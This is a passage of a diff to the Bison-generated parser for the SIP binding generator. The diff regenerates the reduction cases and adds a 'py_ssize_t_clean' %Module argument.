(yyvsp[0].consmodule).docstring; break; + } + } ++#line 4143 "../parser.c" + break; + +- case 190: +-#line 1798 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 190: /* consmodule_body_directive: ifstart */ ++#line 1799 "parser.y" ++ { + (yyval.consmodule).token = TK_IF; + } ++#line 4151 "../parser.c" + break; + +- case 191: +-#line 1801 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 191: /* consmodule_body_directive: ifend */ ++#line 1802 "parser.y" ++ { + (yyval.consmodule).token = TK_END; + } ++#line 4159 "../parser.c" + break; + +- case 192: +-#line 1804 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 192: /* consmodule_body_directive: docstring */ ++#line 1805 "parser.y" ++ { + if (notSkipping()) + { + (yyval.consmodule).token = TK_DOCSTRING; +- (yyval.consmodule).docstring = (yyvsp[(1) - (1)].docstr); ++ (yyval.consmodule).docstring = (yyvsp[0].docstr); + } + else + { +@@ -4470,11 +4172,12 @@ yyreduce: + (yyval.consmodule).docstring = NULL; + } + } ++#line 4176 "../parser.c" + break; + +- case 193: +-#line 1818 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 193: /* compmodule: TK_COMPOMODULE compmodule_args compmodule_body */ ++#line 1819 "parser.y" ++ { + if (notSkipping()) + { + /* Make sure this is the first mention of a module. */ +@@ -4484,99 +4187,109 @@ yyreduce: + if (currentModule->fullname != NULL) + yyerror("%CompositeModule must appear before any %Module directive"); + +- setModuleName(currentSpec, currentModule, (yyvsp[(2) - (3)].compmodule).name); +- currentModule->docstring = (yyvsp[(3) - (3)].compmodule).docstring; ++ setModuleName(currentSpec, currentModule, (yyvsp[-1].compmodule).name); ++ currentModule->docstring = (yyvsp[0].compmodule).docstring; + + setIsComposite(currentModule); + } + } ++#line 4197 "../parser.c" + break; + +- case 194: +-#line 1836 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 194: /* compmodule_args: dottedname */ ++#line 1837 "parser.y" ++ { + resetLexerState(); + +- (yyval.compmodule).name = (yyvsp[(1) - (1)].text); ++ (yyval.compmodule).name = (yyvsp[0].text); + } ++#line 4207 "../parser.c" + break; + +- case 195: +-#line 1841 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.compmodule) = (yyvsp[(2) - (3)].compmodule); ++ case 195: /* compmodule_args: '(' compmodule_arg_list ')' */ ++#line 1842 "parser.y" ++ { ++ (yyval.compmodule) = (yyvsp[-1].compmodule); + } ++#line 4215 "../parser.c" + break; + +- case 197: +-#line 1847 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.compmodule) = (yyvsp[(1) - (3)].compmodule); ++ case 197: /* compmodule_arg_list: compmodule_arg_list ',' compmodule_arg */ ++#line 1848 "parser.y" ++ { ++ (yyval.compmodule) = (yyvsp[-2].compmodule); + +- switch ((yyvsp[(3) - (3)].compmodule).token) ++ switch ((yyvsp[0].compmodule).token) + { +- case TK_NAME: (yyval.compmodule).name = (yyvsp[(3) - (3)].compmodule).name; break; ++ case TK_NAME: (yyval.compmodule).name = (yyvsp[0].compmodule).name; break; + } + } ++#line 4228 "../parser.c" + break; + +- case 198: +-#line 1857 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 198: /* compmodule_arg: TK_NAME '=' dottedname */ ++#line 1858 "parser.y" ++ { + (yyval.compmodule).token = TK_NAME; + +- (yyval.compmodule).name = (yyvsp[(3) - (3)].text); ++ (yyval.compmodule).name = (yyvsp[0].text); + } ++#line 4238 "../parser.c" + break; + +- case 199: +-#line 1864 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 199: /* compmodule_body: %empty */ ++#line 1865 "parser.y" ++ { + (yyval.compmodule).token = 0; + (yyval.compmodule).docstring = NULL; + } ++#line 4247 "../parser.c" + break; + +- case 200: +-#line 1868 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.compmodule) = (yyvsp[(2) - (4)].compmodule); ++ case 200: /* compmodule_body: '{' compmodule_body_directives '}' ';' */ ++#line 1869 "parser.y" ++ { ++ (yyval.compmodule) = (yyvsp[-2].compmodule); + } ++#line 4255 "../parser.c" + break; + +- case 202: +-#line 1874 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.compmodule) = (yyvsp[(1) - (2)].compmodule); ++ case 202: /* compmodule_body_directives: compmodule_body_directives compmodule_body_directive */ ++#line 1875 "parser.y" ++ { ++ (yyval.compmodule) = (yyvsp[-1].compmodule); + +- switch ((yyvsp[(2) - (2)].compmodule).token) ++ switch ((yyvsp[0].compmodule).token) + { +- case TK_DOCSTRING: (yyval.compmodule).docstring = (yyvsp[(2) - (2)].compmodule).docstring; break; ++ case TK_DOCSTRING: (yyval.compmodule).docstring = (yyvsp[0].compmodule).docstring; break; + } + } ++#line 4268 "../parser.c" + break; + +- case 203: +-#line 1884 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 203: /* compmodule_body_directive: ifstart */ ++#line 1885 "parser.y" ++ { + (yyval.compmodule).token = TK_IF; + } ++#line 4276 "../parser.c" + break; + +- case 204: +-#line 1887 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 204: /* compmodule_body_directive: ifend */ ++#line 1888 "parser.y" ++ { + (yyval.compmodule).token = TK_END; + } ++#line 4284 "../parser.c" + break; + +- case 205: +-#line 1890 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 205: /* compmodule_body_directive: docstring */ ++#line 1891 "parser.y" ++ { + if (notSkipping()) + { + (yyval.compmodule).token = TK_DOCSTRING; +- (yyval.compmodule).docstring = (yyvsp[(1) - (1)].docstr); ++ (yyval.compmodule).docstring = (yyvsp[0].docstr); + } + else + { +@@ -4584,107 +4297,119 @@ yyreduce: + (yyval.compmodule).docstring = NULL; + } + } ++#line 4301 "../parser.c" + break; + +- case 206: +-#line 1904 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- if ((yyvsp[(2) - (3)].module).name == NULL) ++ case 206: /* module: TK_MODULE module_args module_body */ ++#line 1905 "parser.y" ++ { ++ if ((yyvsp[-1].module).name == NULL) + yyerror("%Module must have a 'name' argument"); + + if (notSkipping()) + currentModule = configureModule(currentSpec, currentModule, +- currentContext.filename, (yyvsp[(2) - (3)].module).name, (yyvsp[(2) - (3)].module).c_module, +- (yyvsp[(2) - (3)].module).kwargs, (yyvsp[(2) - (3)].module).use_arg_names, (yyvsp[(2) - (3)].module).use_limited_api, +- (yyvsp[(2) - (3)].module).call_super_init, (yyvsp[(2) - (3)].module).all_raise_py_exc, +- (yyvsp[(2) - (3)].module).def_error_handler, (yyvsp[(3) - (3)].module).docstring); +- } ++ currentContext.filename, (yyvsp[-1].module).name, (yyvsp[-1].module).c_module, ++ (yyvsp[-1].module).kwargs, (yyvsp[-1].module).use_arg_names, (yyvsp[-1].module).py_ssize_t_clean, ++ (yyvsp[-1].module).use_limited_api, (yyvsp[-1].module).call_super_init, ++ (yyvsp[-1].module).all_raise_py_exc, (yyvsp[-1].module).def_error_handler, ++ (yyvsp[0].module).docstring); ++ } ++#line 4318 "../parser.c" + break; + +- case 207: +-#line 1915 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 207: /* module: TK_CMODULE dottedname optnumber */ ++#line 1917 "parser.y" ++ { + deprecated("%CModule is deprecated, use %Module and the 'language' argument instead"); + + if (notSkipping()) + currentModule = configureModule(currentSpec, currentModule, +- currentContext.filename, (yyvsp[(2) - (3)].text), TRUE, defaultKwArgs, +- FALSE, FALSE, -1, FALSE, NULL, NULL); ++ currentContext.filename, (yyvsp[-1].text), TRUE, defaultKwArgs, ++ FALSE, FALSE, FALSE, -1, FALSE, NULL, NULL); + } ++#line 4331 "../parser.c" + break; + +- case 208: +-#line 1925 "sip-4.19.23/sipgen/metasrc/parser.y" +- {resetLexerState();} ++ case 208: /* $@8: %empty */ ++#line 1927 "parser.y" ++ {resetLexerState();} ++#line 4337 "../parser.c" + break; + +- case 209: +-#line 1925 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- if ((yyvsp[(3) - (3)].number) >= 0) ++ case 209: /* module_args: dottedname $@8 optnumber */ ++#line 1927 "parser.y" ++ { ++ if ((yyvsp[0].number) >= 0) + deprecated("%Module version number should be specified using the 'version' argument"); + + (yyval.module).c_module = FALSE; + (yyval.module).kwargs = defaultKwArgs; +- (yyval.module).name = (yyvsp[(1) - (3)].text); ++ (yyval.module).name = (yyvsp[-2].text); + (yyval.module).use_arg_names = FALSE; ++ (yyval.module).py_ssize_t_clean = FALSE; + (yyval.module).use_limited_api = FALSE; + (yyval.module).all_raise_py_exc = FALSE; + (yyval.module).call_super_init = -1; + (yyval.module).def_error_handler = NULL; + } ++#line 4356 "../parser.c" + break; + +- case 210: +-#line 1938 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.module) = (yyvsp[(2) - (3)].module); ++ case 210: /* module_args: '(' module_arg_list ')' */ ++#line 1941 "parser.y" ++ { ++ (yyval.module) = (yyvsp[-1].module); + } ++#line 4364 "../parser.c" + break; + +- case 212: +-#line 1944 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.module) = (yyvsp[(1) - (3)].module); ++ case 212: /* module_arg_list: module_arg_list ',' module_arg */ ++#line 1947 "parser.y" ++ { ++ (yyval.module) = (yyvsp[-2].module); + +- switch ((yyvsp[(3) - (3)].module).token) ++ switch ((yyvsp[0].module).token) + { +- case TK_KWARGS: (yyval.module).kwargs = (yyvsp[(3) - (3)].module).kwargs; break; +- case TK_LANGUAGE: (yyval.module).c_module = (yyvsp[(3) - (3)].module).c_module; break; +- case TK_NAME: (yyval.module).name = (yyvsp[(3) - (3)].module).name; break; +- case TK_USEARGNAMES: (yyval.module).use_arg_names = (yyvsp[(3) - (3)].module).use_arg_names; break; +- case TK_USELIMITEDAPI: (yyval.module).use_limited_api = (yyvsp[(3) - (3)].module).use_limited_api; break; +- case TK_ALLRAISEPYEXC: (yyval.module).all_raise_py_exc = (yyvsp[(3) - (3)].module).all_raise_py_exc; break; +- case TK_CALLSUPERINIT: (yyval.module).call_super_init = (yyvsp[(3) - (3)].module).call_super_init; break; +- case TK_DEFERRORHANDLER: (yyval.module).def_error_handler = (yyvsp[(3) - (3)].module).def_error_handler; break; ++ case TK_KWARGS: (yyval.module).kwargs = (yyvsp[0].module).kwargs; break; ++ case TK_LANGUAGE: (yyval.module).c_module = (yyvsp[0].module).c_module; break; ++ case TK_NAME: (yyval.module).name = (yyvsp[0].module).name; break; ++ case TK_USEARGNAMES: (yyval.module).use_arg_names = (yyvsp[0].module).use_arg_names; break; ++ case TK_PYSSIZETCLEAN: (yyval.module).py_ssize_t_clean = (yyvsp[0].module).py_ssize_t_clean; break; ++ case TK_USELIMITEDAPI: (yyval.module).use_limited_api = (yyvsp[0].module).use_limited_api; break; ++ case TK_ALLRAISEPYEXC: (yyval.module).all_raise_py_exc = (yyvsp[0].module).all_raise_py_exc; break; ++ case TK_CALLSUPERINIT: (yyval.module).call_super_init = (yyvsp[0].module).call_super_init; break; ++ case TK_DEFERRORHANDLER: (yyval.module).def_error_handler = (yyvsp[0].module).def_error_handler; break; + } + } ++#line 4385 "../parser.c" + break; + +- case 213: +-#line 1961 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 213: /* module_arg: TK_KWARGS '=' TK_STRING_VALUE */ ++#line 1965 "parser.y" ++ { + (yyval.module).token = TK_KWARGS; + + (yyval.module).c_module = FALSE; +- (yyval.module).kwargs = convertKwArgs((yyvsp[(3) - (3)].text)); ++ (yyval.module).kwargs = convertKwArgs((yyvsp[0].text)); + (yyval.module).name = NULL; + (yyval.module).use_arg_names = FALSE; ++ (yyval.module).py_ssize_t_clean = FALSE; + (yyval.module).use_limited_api = FALSE; + (yyval.module).all_raise_py_exc = FALSE; + (yyval.module).call_super_init = -1; + (yyval.module).def_error_handler = NULL; + } ++#line 4403 "../parser.c" + break; + +- case 214: +-#line 1973 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 214: /* module_arg: TK_LANGUAGE '=' TK_STRING_VALUE */ ++#line 1978 "parser.y" ++ { + (yyval.module).token = TK_LANGUAGE; + +- if (strcmp((yyvsp[(3) - (3)].text), "C++") == 0) ++ if (strcmp((yyvsp[0].text), "C++") == 0) + (yyval.module).c_module = FALSE; +- else if (strcmp((yyvsp[(3) - (3)].text), "C") == 0) ++ else if (strcmp((yyvsp[0].text), "C") == 0) + (yyval.module).c_module = TRUE; + else + yyerror("%Module 'language' argument must be either \"C++\" or \"C\""); +@@ -4692,115 +4417,147 @@ yyreduce: + (yyval.module).kwargs = defaultKwArgs; + (yyval.module).name = NULL; + (yyval.module).use_arg_names = FALSE; ++ (yyval.module).py_ssize_t_clean = FALSE; + (yyval.module).use_limited_api = FALSE; + (yyval.module).all_raise_py_exc = FALSE; + (yyval.module).call_super_init = -1; + (yyval.module).def_error_handler = NULL; + } ++#line 4427 "../parser.c" + break; + +- case 215: +-#line 1991 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 215: /* module_arg: TK_NAME '=' dottedname */ ++#line 1997 "parser.y" ++ { + (yyval.module).token = TK_NAME; + + (yyval.module).c_module = FALSE; + (yyval.module).kwargs = defaultKwArgs; +- (yyval.module).name = (yyvsp[(3) - (3)].text); ++ (yyval.module).name = (yyvsp[0].text); + (yyval.module).use_arg_names = FALSE; ++ (yyval.module).py_ssize_t_clean = FALSE; + (yyval.module).use_limited_api = FALSE; + (yyval.module).all_raise_py_exc = FALSE; + (yyval.module).call_super_init = -1; + (yyval.module).def_error_handler = NULL; + } ++#line 4445 "../parser.c" + break; + +- case 216: +-#line 2003 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 216: /* module_arg: TK_USEARGNAMES '=' bool_value */ ++#line 2010 "parser.y" ++ { + (yyval.module).token = TK_USEARGNAMES; + + (yyval.module).c_module = FALSE; + (yyval.module).kwargs = defaultKwArgs; + (yyval.module).name = NULL; +- (yyval.module).use_arg_names = (yyvsp[(3) - (3)].boolean); ++ (yyval.module).use_arg_names = (yyvsp[0].boolean); ++ (yyval.module).py_ssize_t_clean = FALSE; + (yyval.module).use_limited_api = FALSE; + (yyval.module).all_raise_py_exc = FALSE; + (yyval.module).call_super_init = -1; + (yyval.module).def_error_handler = NULL; + } ++#line 4463 "../parser.c" + break; + +- case 217: +-#line 2015 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 217: /* module_arg: TK_PYSSIZETCLEAN '=' bool_value */ ++#line 2023 "parser.y" ++ { ++ (yyval.module).token = TK_PYSSIZETCLEAN; ++ ++ (yyval.module).c_module = FALSE; ++ (yyval.module).kwargs = defaultKwArgs; ++ (yyval.module).name = NULL; ++ (yyval.module).use_arg_names = FALSE; ++ (yyval.module).py_ssize_t_clean = (yyvsp[0].boolean); ++ (yyval.module).use_limited_api = FALSE; ++ (yyval.module).all_raise_py_exc = FALSE; ++ (yyval.module).call_super_init = -1; ++ (yyval.module).def_error_handler = NULL; ++ } ++#line 4481 "../parser.c" ++ break; ++ ++ case 218: /* module_arg: TK_USELIMITEDAPI '=' bool_value */ ++#line 2036 "parser.y" ++ { + (yyval.module).token = TK_USELIMITEDAPI; + + (yyval.module).c_module = FALSE; + (yyval.module).kwargs = defaultKwArgs; + (yyval.module).name = NULL; + (yyval.module).use_arg_names = FALSE; +- (yyval.module).use_limited_api = (yyvsp[(3) - (3)].boolean); ++ (yyval.module).py_ssize_t_clean = FALSE; ++ (yyval.module).use_limited_api = (yyvsp[0].boolean); + (yyval.module).all_raise_py_exc = FALSE; + (yyval.module).call_super_init = -1; + (yyval.module).def_error_handler = NULL; + } ++#line 4499 "../parser.c" + break; + +- case 218: +-#line 2027 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 219: /* module_arg: TK_ALLRAISEPYEXC '=' bool_value */ ++#line 2049 "parser.y" ++ { + (yyval.module).token = TK_ALLRAISEPYEXC; + + (yyval.module).c_module = FALSE; + (yyval.module).kwargs = defaultKwArgs; + (yyval.module).name = NULL; + (yyval.module).use_arg_names = FALSE; ++ (yyval.module).py_ssize_t_clean = FALSE; + (yyval.module).use_limited_api = FALSE; +- (yyval.module).all_raise_py_exc = (yyvsp[(3) - (3)].boolean); ++ (yyval.module).all_raise_py_exc = (yyvsp[0].boolean); + (yyval.module).call_super_init = -1; + (yyval.module).def_error_handler = NULL; + } ++#line 4517 "../parser.c" + break; + +- case 219: +-#line 2039 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 220: /* module_arg: TK_CALLSUPERINIT '=' bool_value */ ++#line 2062 "parser.y" ++ { + (yyval.module).token = TK_CALLSUPERINIT; + + (yyval.module).c_module = FALSE; + (yyval.module).kwargs = defaultKwArgs; + (yyval.module).name = NULL; + (yyval.module).use_arg_names = FALSE; ++ (yyval.module).py_ssize_t_clean = FALSE; + (yyval.module).use_limited_api = FALSE; + (yyval.module).all_raise_py_exc = FALSE; +- (yyval.module).call_super_init = (yyvsp[(3) - (3)].boolean); ++ (yyval.module).call_super_init = (yyvsp[0].boolean); + (yyval.module).def_error_handler = NULL; + } ++#line 4535 "../parser.c" + break; + +- case 220: +-#line 2051 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 221: /* module_arg: TK_DEFERRORHANDLER '=' TK_NAME_VALUE */ ++#line 2075 "parser.y" ++ { + (yyval.module).token = TK_DEFERRORHANDLER; + + (yyval.module).c_module = FALSE; + (yyval.module).kwargs = defaultKwArgs; + (yyval.module).name = NULL; + (yyval.module).use_arg_names = FALSE; ++ (yyval.module).py_ssize_t_clean = FALSE; + (yyval.module).use_limited_api = FALSE; + (yyval.module).all_raise_py_exc = FALSE; + (yyval.module).call_super_init = -1; +- (yyval.module).def_error_handler = (yyvsp[(3) - (3)].text); ++ (yyval.module).def_error_handler = (yyvsp[0].text); + } ++#line 4553 "../parser.c" + break; + +- case 221: +-#line 2063 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 222: /* module_arg: TK_VERSION '=' TK_NUMBER_VALUE */ ++#line 2088 "parser.y" ++ { + deprecated("%Module version numbers are deprecated and ignored"); + +- if ((yyvsp[(3) - (3)].number) < 0) ++ if ((yyvsp[0].number) < 0) + yyerror("%Module 'version' argument cannot be negative"); + + (yyval.module).token = TK_VERSION; +@@ -4809,68 +4566,76 @@ yyreduce: + (yyval.module).kwargs = defaultKwArgs; + (yyval.module).name = NULL; + (yyval.module).use_arg_names = FALSE; ++ (yyval.module).py_ssize_t_clean = FALSE; + (yyval.module).use_limited_api = FALSE; + (yyval.module).all_raise_py_exc = FALSE; + (yyval.module).call_super_init = -1; + (yyval.module).def_error_handler = NULL; + } ++#line 4576 "../parser.c" + break; + +- case 222: +-#line 2082 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 223: /* module_body: %empty */ ++#line 2108 "parser.y" ++ { + (yyval.module).token = 0; + (yyval.module).docstring = NULL; + } ++#line 4585 "../parser.c" + break; + +- case 223: +-#line 2086 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.module) = (yyvsp[(2) - (4)].module); ++ case 224: /* module_body: '{' module_body_directives '}' ';' */ ++#line 2112 "parser.y" ++ { ++ (yyval.module) = (yyvsp[-2].module); + } ++#line 4593 "../parser.c" + break; + +- case 225: +-#line 2092 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.module) = (yyvsp[(1) - (2)].module); ++ case 226: /* module_body_directives: module_body_directives module_body_directive */ ++#line 2118 "parser.y" ++ { ++ (yyval.module) = (yyvsp[-1].module); + +- switch ((yyvsp[(2) - (2)].module).token) ++ switch ((yyvsp[0].module).token) + { +- case TK_DOCSTRING: (yyval.module).docstring = (yyvsp[(2) - (2)].module).docstring; break; ++ case TK_DOCSTRING: (yyval.module).docstring = (yyvsp[0].module).docstring; break; + } + } ++#line 4606 "../parser.c" + break; + +- case 226: +-#line 2102 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 227: /* module_body_directive: ifstart */ ++#line 2128 "parser.y" ++ { + (yyval.module).token = TK_IF; + } ++#line 4614 "../parser.c" + break; + +- case 227: +-#line 2105 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 228: /* module_body_directive: ifend */ ++#line 2131 "parser.y" ++ { + (yyval.module).token = TK_END; + } ++#line 4622 "../parser.c" + break; + +- case 228: +-#line 2108 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 229: /* module_body_directive: autopyname */ ++#line 2134 "parser.y" ++ { + (yyval.module).token = TK_AUTOPYNAME; + } ++#line 4630 "../parser.c" + break; + +- case 229: +-#line 2111 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 230: /* module_body_directive: docstring */ ++#line 2137 "parser.y" ++ { + if (notSkipping()) + { + (yyval.module).token = TK_DOCSTRING; +- (yyval.module).docstring = (yyvsp[(1) - (1)].docstr); ++ (yyval.module).docstring = (yyvsp[0].docstr); + } + else + { +@@ -4878,11 +4643,12 @@ yyreduce: + (yyval.module).docstring = NULL; + } + } ++#line 4647 "../parser.c" + break; + +- case 231: +-#line 2126 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 232: /* dottedname: TK_PATH_VALUE */ ++#line 2152 "parser.y" ++ { + /* + * The grammar design is a bit broken and this is the easiest way + * to allow periods in names. +@@ -4890,435 +4656,487 @@ yyreduce: + + char *cp; + +- for (cp = (yyvsp[(1) - (1)].text); *cp != '\0'; ++cp) ++ for (cp = (yyvsp[0].text); *cp != '\0'; ++cp) + if (*cp != '.' && *cp != '_' && !isalnum(*cp)) + yyerror("Invalid character in name"); + +- (yyval.text) = (yyvsp[(1) - (1)].text); ++ (yyval.text) = (yyvsp[0].text); + } ++#line 4666 "../parser.c" + break; + +- case 232: +-#line 2142 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 233: /* optnumber: %empty */ ++#line 2168 "parser.y" ++ { + (yyval.number) = -1; + } ++#line 4674 "../parser.c" + break; + +- case 234: +-#line 2148 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- if ((yyvsp[(2) - (2)].include).name == NULL) ++ case 235: /* include: TK_INCLUDE include_args */ ++#line 2174 "parser.y" ++ { ++ if ((yyvsp[0].include).name == NULL) + yyerror("%Include must have a 'name' argument"); + + if (notSkipping()) +- parseFile(NULL, (yyvsp[(2) - (2)].include).name, NULL, (yyvsp[(2) - (2)].include).optional); ++ parseFile(NULL, (yyvsp[0].include).name, NULL, (yyvsp[0].include).optional); + } ++#line 4686 "../parser.c" + break; + +- case 235: +-#line 2157 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 236: /* include_args: TK_PATH_VALUE */ ++#line 2183 "parser.y" ++ { + resetLexerState(); + +- (yyval.include).name = (yyvsp[(1) - (1)].text); ++ (yyval.include).name = (yyvsp[0].text); + (yyval.include).optional = FALSE; + } ++#line 4697 "../parser.c" + break; + +- case 236: +-#line 2163 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.include) = (yyvsp[(2) - (3)].include); ++ case 237: /* include_args: '(' include_arg_list ')' */ ++#line 2189 "parser.y" ++ { ++ (yyval.include) = (yyvsp[-1].include); + } ++#line 4705 "../parser.c" + break; + +- case 238: +-#line 2169 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.include) = (yyvsp[(1) - (3)].include); ++ case 239: /* include_arg_list: include_arg_list ',' include_arg */ ++#line 2195 "parser.y" ++ { ++ (yyval.include) = (yyvsp[-2].include); + +- switch ((yyvsp[(3) - (3)].include).token) ++ switch ((yyvsp[0].include).token) + { +- case TK_NAME: (yyval.include).name = (yyvsp[(3) - (3)].include).name; break; +- case TK_OPTIONAL: (yyval.include).optional = (yyvsp[(3) - (3)].include).optional; break; ++ case TK_NAME: (yyval.include).name = (yyvsp[0].include).name; break; ++ case TK_OPTIONAL: (yyval.include).optional = (yyvsp[0].include).optional; break; + } + } ++#line 4719 "../parser.c" + break; + +- case 239: +-#line 2180 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 240: /* include_arg: TK_NAME '=' TK_PATH_VALUE */ ++#line 2206 "parser.y" ++ { + (yyval.include).token = TK_NAME; + +- (yyval.include).name = (yyvsp[(3) - (3)].text); ++ (yyval.include).name = (yyvsp[0].text); + (yyval.include).optional = FALSE; + } ++#line 4730 "../parser.c" + break; + +- case 240: +-#line 2186 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 241: /* include_arg: TK_OPTIONAL '=' bool_value */ ++#line 2212 "parser.y" ++ { + (yyval.include).token = TK_OPTIONAL; + + (yyval.include).name = NULL; +- (yyval.include).optional = (yyvsp[(3) - (3)].boolean); ++ (yyval.include).optional = (yyvsp[0].boolean); + } ++#line 4741 "../parser.c" + break; + +- case 241: +-#line 2194 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 242: /* optinclude: TK_OPTINCLUDE TK_PATH_VALUE */ ++#line 2220 "parser.y" ++ { + deprecated("%OptionalInclude is deprecated, use %Include and the 'optional' argument instead"); + + if (notSkipping()) +- parseFile(NULL, (yyvsp[(2) - (2)].text), NULL, TRUE); ++ parseFile(NULL, (yyvsp[0].text), NULL, TRUE); + } ++#line 4752 "../parser.c" + break; + +- case 242: +-#line 2202 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 243: /* import: TK_IMPORT import_args */ ++#line 2228 "parser.y" ++ { + if (notSkipping()) +- newImport((yyvsp[(2) - (2)].import).name); ++ newImport((yyvsp[0].import).name); + } ++#line 4761 "../parser.c" + break; + +- case 243: +-#line 2208 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 244: /* import_args: TK_PATH_VALUE */ ++#line 2234 "parser.y" ++ { + resetLexerState(); + +- (yyval.import).name = (yyvsp[(1) - (1)].text); ++ (yyval.import).name = (yyvsp[0].text); + } ++#line 4771 "../parser.c" + break; + +- case 244: +-#line 2213 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.import) = (yyvsp[(2) - (3)].import); ++ case 245: /* import_args: '(' import_arg_list ')' */ ++#line 2239 "parser.y" ++ { ++ (yyval.import) = (yyvsp[-1].import); + } ++#line 4779 "../parser.c" + break; + +- case 246: +-#line 2219 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.import) = (yyvsp[(1) - (3)].import); ++ case 247: /* import_arg_list: import_arg_list ',' import_arg */ ++#line 2245 "parser.y" ++ { ++ (yyval.import) = (yyvsp[-2].import); + +- switch ((yyvsp[(3) - (3)].import).token) ++ switch ((yyvsp[0].import).token) + { +- case TK_NAME: (yyval.import).name = (yyvsp[(3) - (3)].import).name; break; ++ case TK_NAME: (yyval.import).name = (yyvsp[0].import).name; break; + } + } ++#line 4792 "../parser.c" + break; + +- case 247: +-#line 2229 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 248: /* import_arg: TK_NAME '=' TK_PATH_VALUE */ ++#line 2255 "parser.y" ++ { + (yyval.import).token = TK_NAME; + +- (yyval.import).name = (yyvsp[(3) - (3)].text); ++ (yyval.import).name = (yyvsp[0].text); + } ++#line 4802 "../parser.c" + break; + +- case 248: +-#line 2236 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 249: /* optaccesscode: %empty */ ++#line 2262 "parser.y" ++ { + (yyval.codeb) = NULL; + } ++#line 4810 "../parser.c" + break; + +- case 249: +-#line 2239 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 250: /* optaccesscode: TK_ACCESSCODE codeblock */ ++#line 2265 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 4818 "../parser.c" + break; + +- case 250: +-#line 2244 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 251: /* optgetcode: %empty */ ++#line 2270 "parser.y" ++ { + (yyval.codeb) = NULL; + } ++#line 4826 "../parser.c" + break; + +- case 251: +-#line 2247 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 252: /* optgetcode: TK_GETCODE codeblock */ ++#line 2273 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 4834 "../parser.c" + break; + +- case 252: +-#line 2252 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 253: /* optsetcode: %empty */ ++#line 2278 "parser.y" ++ { + (yyval.codeb) = NULL; + } ++#line 4842 "../parser.c" + break; + +- case 253: +-#line 2255 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 254: /* optsetcode: TK_SETCODE codeblock */ ++#line 2281 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 4850 "../parser.c" + break; + +- case 254: +-#line 2260 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 255: /* copying: TK_COPYING codeblock */ ++#line 2286 "parser.y" ++ { + if (notSkipping()) +- appendCodeBlock(¤tModule->copying, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(¤tModule->copying, (yyvsp[0].codeb)); + } ++#line 4859 "../parser.c" + break; + +- case 255: +-#line 2266 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 256: /* exphdrcode: TK_EXPHEADERCODE codeblock */ ++#line 2292 "parser.y" ++ { + if (notSkipping()) +- appendCodeBlock(¤tSpec->exphdrcode, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(¤tSpec->exphdrcode, (yyvsp[0].codeb)); + } ++#line 4868 "../parser.c" + break; + +- case 256: +-#line 2272 "sip-4.19.23/sipgen/metasrc/parser.y" +- { 